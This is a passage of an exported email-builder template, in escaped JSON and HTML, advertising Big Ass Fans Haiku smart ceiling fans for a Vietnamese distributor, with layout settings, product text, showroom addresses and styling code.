40px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1607002319908-vvb2.png\\\",\\\"width\\\":600,\\\"height\\\":48},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_7\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_13\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_10\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"opHjyGdo4n\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"5EjQAT1In3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"fa-SDaQMps\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#727171\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>SMART CEILING FAN, SMART MODES<\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"SMsQFcA9L4\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_12\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 150%;\\\\\\\">Haiku can mimic a gentle breeze, save energy, adjust for optimal sleep, and run on a timer\\u2014all through the included remote or the Big Ass Fans Haiku mobile app.<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_12\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"aVoSxPEcGT\\\",\\\"contents\\\":[{\\\"id\\\":\\\"0dAzzodDxa\\\",\\\"type\\\":\\\"video\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"video\\\":{\\\"url\\\":\\\"https:\\/\\/youtu.be\\/AjYMiqVCkrw?lis\\\",\\\"thumbnail\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677123215015-video_youtube_AjYMiqVCkrw.jpg\\\",\\\"videoId\\\":\\\"AjYMiqVCkrw\\\",\\\"type\\\":\\\"youtube\\\"},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_video_1\\\",\\\"htmlClassNames\\\":\\\"u_content_video\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_9\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"THUwYakHTm\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"kwzqhG799A\\\",\\\"contents\\\":[{\\\"id\\\":\\\"o3Ik9pNzWB\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677298683634-quet_BR_code_2023.jpg\\\",\\\"width\\\":800,\\\"height\\\":491},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_9\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"3tEuovNfbn\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_17\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_13\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"OL5bSnxx7M\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"jz40CXaHYv\\\",\\\"contents\\\":[{\\\"id\\\":\\\"zFw374rru6\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"circle-black\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/www.linkedin.com\\/company\\/hogiaphat\\/\\\",\\\"name\\\":\\\"LinkedIn\\\"},{\\\"url\\\":\\\"https:\\/\\/twitter.com\\/hgpco\\\",\\\"name\\\":\\\"Twitter\\\"},{\\\"url\\\":\\\"https:\\/\\/www.instagram.com\\/quatcaocap\\/\\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\"https:\\/\\/www.youtube.com\\/channel\\/UCKlFoDwgsjdlMD9gxwQYPVw\\\",\\\"name\\\":\\\"YouTube\\\"},{\\\"name\\\":\\\"Facebook\\\",\\\"url\\\":\\\"https:\\/\\/www.facebook.com\\/bigfans.vn\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":15,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"YGvjojNYO8\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#333333\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"180%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_14\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px; font-family: inherit;\\\\\\\"><strong><span style=\\\\\\\"line-height: 21.6px;\\\\\\\">GI\\u1ea2I PH\\u00c1P L\\u00c0M M\\u00c1T TO\\u00c0N DI\\u1ec6N KH\\u00d4NG GIAN NH\\u00c0 \\u1ede - V\\u0102N PH\\u00d2NG - C\\u00d4NG NGHI\\u1ec6P<\\/span><\\/strong><\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px; font-family: inherit;\\\\\\\"><strong>SR THU DUC: <\\/strong>184 Tran Luu, An Phu, Thu Duc, HCM<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px; font-family: inherit;\\\\\\\"><strong>SR DISTRICT 7: <\\/strong>812 Happy Valley, Nguyen Van Linh, Tan Phong, District 7, HCM<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px; font-family: inherit;\\\\\\\">WIT.\\u00a0 All rights reserved. <\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px; font-family: inherit;\\\\\\\">Tax: 0315778682<\\/span><br \\/><span style=\\\\\\\"font-size: 12px; line-height: 21.6px; font-family: inherit;\\\\\\\"><a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaG9naWFwaGF0LnZuL2xpZW4taGUiLCJ0YXJnZXQiOiJfYmxhbmsifX0=\\\\\\\"><span style=\\\\\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\\\\\">Manage Preferences<\\/span> <\\/a>| <a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/haiku.hogiaphat.vn\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaGFpa3UuaG9naWFwaGF0LnZuIiwidGFyZ2V0IjoiX2JsYW5rIn19\\\\\\\"><span style=\\\\\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\\\\\">View in browser<\\/span>\\u00a0<\\/a><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_16\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_12\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Montserrat\\\",\\\"value\\\":\\\"\'Montserrat\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#fdf4ef\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":12}\"', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-33p33 {\\r\\n    width: 199.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 300px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #0000ee; text-decoration: underline; } @media (max-width: 480px) { #u_content_text_2 .v-text-align { text-align: center !important; } #u_content_image_2 .v-src-width { width: auto !important; } #u_content_image_2 .v-src-max-width { max-width: 60% !important; } #u_content_image_3 .v-src-width { width: auto !important; } #u_content_image_3 .v-src-max-width { max-width: 60% !important; } #u_content_image_4 .v-src-width { width: auto !important; } #u_content_image_4 .v-src-max-width { max-width: 60% !important; } }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #fdf4ef;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #fdf4ef;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #fdf4ef;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #bfd8d2;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #bfd8d2;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 15px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      <a href=\\\"https:\\/\\/hogiaphat.vn\\/\\\" target=\\\"_blank\\\">\\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677121551729-logo-baf.gif\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 28%;max-width: 162.4px;\\\" width=\\\"162.4\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      <\\/a>\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1677121836979-01-h.jpg\');background-repeat: no-repeat;background-position: center top;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1677121836979-01-h.jpg\');background-repeat: no-repeat;background-position: center top;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" 